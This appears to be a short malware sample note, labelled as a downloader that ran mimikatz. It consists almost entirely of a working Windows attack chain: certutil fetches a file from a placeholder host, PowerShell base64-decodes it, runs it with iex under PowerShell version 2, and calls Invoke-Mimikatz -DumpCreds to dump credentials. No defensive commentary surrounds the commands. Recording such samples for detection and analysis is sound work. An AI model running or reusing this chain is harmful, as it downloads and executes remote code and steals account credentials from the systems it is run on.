sample downloader that executed mimikatz
certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt';
$B64 = get-content test.txt ;
$clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64));
$clear |out-file -filepath 'test.txt';
powershell -version 2 -command "iex (get-content 'test.txt'|out-string);
Invoke-Mimikatz -DumpCreds